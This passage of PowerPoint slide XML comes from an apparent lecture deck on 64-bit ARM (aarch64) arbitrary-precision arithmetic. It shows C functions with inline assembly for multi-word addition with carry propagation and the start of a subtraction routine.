              <a:t>, uint64_t* c) {</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asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> volatile (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    // clear carry</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mrs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x9, NZCV\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x10, 0xffffffff0fffffff\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "and    x9, x9, x10\n\t"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msr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    NZCV, x9\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    // load parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x8, 0\n\t"       // indexing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x9, %[c]\n\t"    // address of output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x10, %[a]\n\t"   // address of input 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x11, %[b]\n\t"   // address of input 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x12, %[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>]\n\t"  // size of first array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x13, %[sb]\n\t"  // size of second array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    // do carry addition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "1:\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40736A1D-2D43-4F4A-BFC4-84764E6DA51B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6412404" y="1159993"/>
            <a:ext cx="6028978"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600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>// load first operand</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ldr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x15, [x10,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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    // load second operand or 0 depending on sb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x14, 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cbz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x13, 2f\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "sub    x13, x13, 1\n\t"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ldr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x14, [x11,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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "2:\n\t"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adcs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   x16, x15, x14\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "str    x16, [x9,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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "add    x8, x8, 1\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "sub    x12, x12, 1\n\t"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cbnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   x12, 1b\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    // propagate carry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x15, 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adc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x16, x15, x15\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "str    x16, [x9,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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    :: [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>] "r" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>), [a] "r" (a), [sb] "r" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>), [b] "r" (b),</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sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>] "r" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>), [c] "r" (c): );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2536522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6" y="230884"/>
            <a:ext cx="12009120" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>64 bit ARM (aarch64)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{350B86CB-86DF-B443-909F-6C519B40C6C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276124" y="1403302"/>
            <a:ext cx="6028978"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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>u_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, uint64_t* a, uint64_t* b, int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>size_c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, uint64_t* c) {</a:t>
            </a:r>
          </a:p>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asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> volatile (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    // set carry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sbcs</a:t>
            </a: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mrs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x9, NZCV\n\t"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x10, 0x20000000\n\t"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orr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    x9, x9, x10\n\t"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msr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    NZCV, x9\n\t"</a:t>
            </a:r>
          </a:p>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 load parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x8, 0\n\t"       // indexing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x9, %[c]\n\t"    // address of output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x10, %[a]\n\t"   // address of input 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x11, %[b]\n\t"   // address of input 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x12, %[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>]\n\t"  // size of first array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    "mov    x13, %[sb]\n\t"  // size of second array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3B9755-5C8D-6444-9C15-FBD18C3DB687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
